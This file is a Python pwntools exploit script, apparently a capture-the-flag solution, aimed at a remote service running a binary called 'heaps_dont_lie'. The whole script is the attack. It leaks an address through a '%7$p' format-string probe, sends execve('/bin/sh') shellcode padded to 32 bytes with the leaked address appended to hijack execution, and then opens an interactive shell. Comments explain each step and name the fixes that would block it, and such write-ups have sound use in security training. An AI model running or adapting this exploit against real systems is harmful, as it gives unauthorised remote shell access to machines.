#!/usr/bin/python3
from pwn import *
import time

# Target binary; checksec output is suppressed here, so the protections it
# was built with are not visible from this script.
context.binary = target = ELF("./heaps_dont_lie", checksec=False)

# r = process()
r = remote("94.72.112.248", 1244)


# helpers: thin wrappers around the tube so the rest reads linearly
def send_line(data):
    return r.sendline(data)


def send_raw(data):
    return r.send(data)


s = send_line
ss = send_raw

# Step 1: information leak. The service echoes our first input through a
# format function, so "%7$p" prints the 7th variadic slot as a pointer; the
# value read back after "tune : " is offset by 0x850 to get the address used
# below. A constant format string on the server side removes this leak.
fmt_probe = b"%7$p"
send_line(fmt_probe)
r.recvuntil(b"tune : ")
heap_addr = int(r.recvline().strip(), 16) + 0x850
log.info("heap: %#x", heap_addr)

# Step 2: second input. Machine code for execve("/bin/sh", NULL, NULL),
# padded to 32 bytes, then the leaked address appended right after it
# (presumably a saved pointer on the stack that the oversized read reaches —
# not verifiable from this script). A length-checked read and NX on the
# region holding this buffer would each stop it.
shellcode_src = """
 lea rdi, [rdx+19]
 xor rsi, rsi
 xor rdx, rdx
 mov rax, 59
 syscall
 """
payload = asm(shellcode_src) + b"/bin/sh\0"
payload = payload.ljust(32, b"A")  # same as b"A"*(32-len(...)) for len <= 32
payload += p64(heap_addr)
send_line(payload)
r.interactive()